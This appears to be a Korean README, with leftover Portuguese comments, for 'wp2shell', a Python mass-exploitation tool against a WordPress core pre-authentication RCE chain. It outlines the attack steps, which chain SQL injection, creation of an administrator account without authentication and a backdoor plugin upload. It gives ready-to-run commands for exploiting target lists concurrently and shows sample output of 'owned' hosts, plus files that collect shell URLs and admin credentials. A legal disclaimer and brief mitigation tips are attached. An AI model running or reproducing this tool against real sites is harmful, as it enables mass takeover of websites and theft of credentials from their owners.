WordPress Core 사전 인증 RCE 체인 CVE-2026-63030 및 CVE-2026-60137에 대한 Python 대량 익스플로잇 및 탐지기로, SQL 인젝션을 원격 코드 실행으로 연계합니다.
| 속성 | 세부 정보 |
|---|---|
| CVE ID | CVE-2026-63030 (+ CVE-2026-60137) |
| 체인 | wp2shell — 사전 인증 RCE |
| 심각도 | 🔴 치명적 (CVSS 9.8) |
| 대상 | WordPress Core (플러그인 없음) |
| 영향받는 버전 (RCE) | 6.9.0 – 6.9.4 및 7.0.0 – 7.0.1 |
| 영향받는 버전 (SQLi만 해당) | 6.8.0 – 6.8.5 |
| 수정됨 | 6.8.6 / 6.9.5 / 7.0.2 (2026년 7월 18일) |
| 인증 필요 여부 | 없음 |
WordPress 코어의 두 가지 연쇄 취약점:
WP_Query의 author__not_in 매개변수에 대한 SQL 인젝션./wp-json/batch/v1 엔드포인트가 배치 항목의 동기화를 깨뜨려 요청이 다음 경로로 "넘어가게" 만듭니다.이 체인은 SQLi를 사전 인증 RCE로 전환합니다:
route confusion /wp-json/batch/v1 ─► SQLi no author__not_in
│ │
└──────────────┬─────────────────────┘
▼
UNION fake-post + oEmbed + changeset poisoning
▼
POST /wp/v2/users (roles: administrator) ← admin criado sem auth
▼
login → upload plugin backdoor → RCE
대체 방법: 직접 INTO OUTFILE (FILE 권한) 및 블라인드 해시 추출 + 크래킹.
python wp2shell.py exploit -l targets.txt --cmd whoami --authorized -k -c 10 --delay 2
python wp2shell.py remote -l targets.txt --authorized --active-probe -c 20 -f csv -o scan.csv
| 옵션 | 설명 |
|---|---|
-l, --targets-file | 한 줄에 하나의 대상 (반복 가능, 제한 없음) |
-u, --target | 단일 대상 |
--cmd | 대상에서 실행할 명령 |
--authorized | 필수 (또는 WP2SHELL_AUTHORIZED=1) |
-c, --concurrency | 병렬 대상 수 (1–32) |
--delay | 타이밍/추출 SLEEP (2 = 견고함) |
--rate | 대상당 초당 요청 수 |
-k, --insecure | TLS 무시 |
--proxy | HTTP 프록시 |
--wordlist / --password / --username | 자격 증명 대체 |
--log / --owned / --results-csv | 출력 파일 |
[+] [14:22:31] https://target.com OWNED ✓1 ~0 ✗10
[~] [14:22:32] https://other.com ADMIN ✓1 ~1 ✗10
---- SUMMARY ----
[+] owned=1 [~] admin=1 [-] fail=10 [.] error=0
owned.txt — RCE 성공 대상 (셸 URL)admins.txt — RCE 싱크 없이 생성된 관리자 (자격 증명)exploit_log.txt — 대상별 상세 정보results.csv — 요약 (exit_code: 0=owned, 4=admin, 2=fail, 3=error)whl_page) + 일반적인 슬러그├── wp2shell.py # exploit + detector
├── targets.txt # alvos (uma URL por linha)
├── owned.txt # RCE conseguido (auto-criado)
├── admins.txt # admins criados (auto-criado)
└── README.md
╔══════════════════════════════════════════════════════════════════╗
║ LEGAL DISCLAIMER ║
╠══════════════════════════════════════════════════════════════════╣
║ This tool is provided for EDUCATIONAL and AUTHORIZED ║
║ SECURITY TESTING purposes only. ║
║ Only use on systems you own or have explicit permission. ║
║ The author is NOT responsible for any misuse or damage. ║
╚══════════════════════════════════════════════════════════════════╝
/wp-json/batch/v1 및 /?rest_route=/batch/v1에 대한 비인증 POST 차단wp-content/uploads/ 및 wp-content/plugins/에서 의심스러운 PHP 감사